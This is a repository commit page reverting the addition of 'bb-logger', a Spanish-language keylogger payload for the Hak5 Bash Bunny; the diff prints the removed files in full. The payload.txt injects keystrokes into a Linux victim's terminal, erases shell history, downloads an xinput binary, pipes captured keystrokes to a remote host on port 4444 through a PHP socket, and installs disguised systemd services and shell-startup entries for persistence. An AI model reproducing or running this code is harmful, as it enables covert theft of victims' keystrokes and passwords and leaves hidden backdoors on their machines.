hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #587 from hak5/revert-583-master 

Revert "Add bb-logger keylogger"
pull/620/head
hak5glytch 2023-06-06 14:03:31 -05:00 committed by GitHub
parent 7263f81135 f7d2a5879c
commit 0279a82f4b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 0 additions and 184 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
README.md
View File

@ -1,13 +1,7 @@
# Payload Library for the Bash Bunny by Hak5
### For spanish users: Por favor, comenta positivamente en [esta pull request](https://github.com/hak5/bashbunny-payloads/pull/583) para traer un payload español y este gran payload para el bash bunny al repositorio oficial de Hak5.
This repository contains payloads and extensions for the Hak5 Bash Bunny. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads.
## Ediciones
- Se añadió el payload [bb-logger](https://github.com/Genplat/bb-logger)
## About the Bash Bunny
By emulating combinations of trusted USB devices — like gigabit Ethernet, serial, flash storage and keyboards — the Bash Bunny tricks computers into divulging data, exfiltrating documents, installing backdoors and many more exploits.

50
payloads/library/credentials/bb-logger/BBLoggerDecoder
View File

@ -1,50 +0,0 @@
usage () {
echo -e "BBLoggerDecoder decodifica las teclas pulsadas por el payload bblogger del bash bunny.\nCreado Por Genplat en base a duckylogger, el UNICO keylogger para el bash bunny."
echo -e "Uso: Decodificar log capturado:\t[./duckyLoggerDecoder -f <Log> -m <modo> -o <output>]";
echo -e "\nOptions:"
echo -e "-f\tEspecifica el log."
echo -e "-m\tSeleccionar modo (normal|informative)"
echo -e "-o\tArchivo de output."
echo -e "-h\tPara ver este menú."
}
while getopts o:m:f:h: flag
do
case "${flag}" in
o) output=$OPTARG ;;
m) mode=$OPTARG ;;
f) filename=$OPTARG ;;
h) help=$OPTARG ;;
*)
usage
exit 1
esac
done
if [ -z "$output" ] && [ -z "$filename" ]; then
usage
exit 1
fi
if [ -z "$filename" ]; then
echo -e "BBLoggerDecoder: Falta una opción \"-f\"(Archivo de log).\nUtiliza \"-h\" para mas información." >&2
exit 1
fi
if [ -z "$output" ]; then
echo -e "BBLoggerDecoder: Falta una opción \"-f\"(Archivo de log).\nUtiliza \"-h\" para mas información." >&2
exit 1
fi
if [ -z "$mode" ]; then
echo -e "BBLoggerDecoder: Falta una opción \"-f\"(Modo no especificado).\nUtiliza \"-h\" para mas información." >&2
exit 1
fi
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
echo -e "BBLoggerDecoder: Falta una opción \"-f\"(Modo invalido).\nUtiliza \"-h\" para mas información." >&2
exit 1
fi
if [ "$mode" == "normal" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
exit 1
fi
if [ "$mode" == "informative" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
exit 1
fi

30
payloads/library/credentials/bb-logger/README.md
View File

@ -1,30 +0,0 @@
# Bash Bunny KeyLogger
## Adapted from [duckylogger](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/credentials/DuckyLogger)
### NOVEDADES:
-Compatibilidad para bash bunny</p>
-100% en español</p>
-Un par de añadidos adicionales meramente esteticos</p>
### ¿Que es esto?
Este es un payload para el [**bash bunny**](https://hak5.org/collections/hotplug-attack-tools/products/bash-bunny) de [**Hak5**](https://hak5.org) creado por **Genplat** (yo), el payload registra las pulsaciónes del teclado de la victima y las manda a los servidores que tu elijas, el mismo está basado en [duckylogger](https://github.com/hak5/usbrubberducky-payloads/tree/master/payloads/library/credentials/DuckyLogger) y adaptado para funcionar en el bash bunny.
### ¿Como se utiliza?
#### Edita la IP en la linea `59` a la IP y puerto de tus servidores.
### ¿Funciona?
#### Debería funcionar, pero todavía no fue probado, unas horas despues de que este repo sea publicado se probará, recuerda, es **solo** para **Linux**.
### Hecho por:
#### [**Genplat**](https://github.com/Genplat)
### ¡Dona!
[![Patreon](https://img.shields.io/badge/Patreon-F96854?style=for-the-badge&logo=patreon&logoColor=white)](https://patreon.com/elite6_27) [![Ko-Fi](https://img.shields.io/badge/Ko--fi-F16061?style=for-the-badge&logo=ko-fi&logoColor=white)](https://ko-fi.com/elite6_27)
##### **Bitcoin: 34MSaTHspfEwNdy13u6tQKSkqXhtJdGgfv**
> BunnyLogger: Una hora despues de publicar el repo me enteré de que existía [BunnyLogger](https://shop.hak5.org/blogs/payloads/bunnylogger), este repo, de **NINGUNA** manera fue creado en base al BunnyLogger, por lo cual, esto puede servir como una gran alternativa a el BunnyLogger, además, leyendo el código del **BunnyLogger** me di cuenta de que este requiere de montar el bash bunny, lo cual puede provocar algunos inconvenientes, este código NO monta el bash bunny.

98
payloads/library/credentials/bb-logger/payload.txt
View File

@ -1,98 +0,0 @@
#!/bin/bash
#
# Title: BashBunny Logger
#
# Description:
# Script By:
# -Genplat Dev 6-27
# Join: discord.gg/elite6-27
#
# Author: Genplat
# Version: 1.0
# Category: Execution
# Target: Linux
# Attackmodes: HID and STORAGE
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="Loading"
######## SETUP ########
LED SETUP
ATTACKMODE HID
GET SWITCH_POSITION
udisk mount
RUN UNITY terminator
Q DELAY 600
Q STRING # Proceso Rutinario Del Sistema. NO PULSE NINGUNA TECLA HASTA QUE TERMINE.
######## ATTACK ########
LED ATTACK
Q STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
Q ENTER
Q STRING mkdir /var/tmp/.system
Q ENTER
Q STRING echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
Q ENTER
Q STRING chmod +x /var/tmp/.system/sys
Q ENTER
Q STRING cd /var/tmp/.system/
Q ENTER
Q STRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\?raw=true
Q ENTER
Q STRING chmod +x xinput
Q ENTER
Q STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
Q ENTER
Q STRING chmod +x /var/tmp/.system/systemBus
Q ENTER
Q STRING mkdir -p ~/.config/systemd/user
Q ENTER
Q STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
Q ENTER
Q STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
Q ENTER
Q STRING chmod +x /var/tmp/.system/reboot
Q ENTER
Q STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
Q ENTER
Q STRING systemctl --user daemon-reload
Q ENTER
Q STRING systemctl --user enable --now systemBUS.service
Q ENTER
Q STRING systemctl --user start --now systemBUS.service
Q ENTER
Q STRING systemctl --user enable --now reboot.service
Q ENTER
Q STRING systemctl --user start --now reboot.service
Q ENTER
Q STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
Q ENTER
Q STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
Q ENTER
######## CLEANUP ########
LED CLEANUP
sync
######## FINISH ########
LED FINISH
shutdown -h 0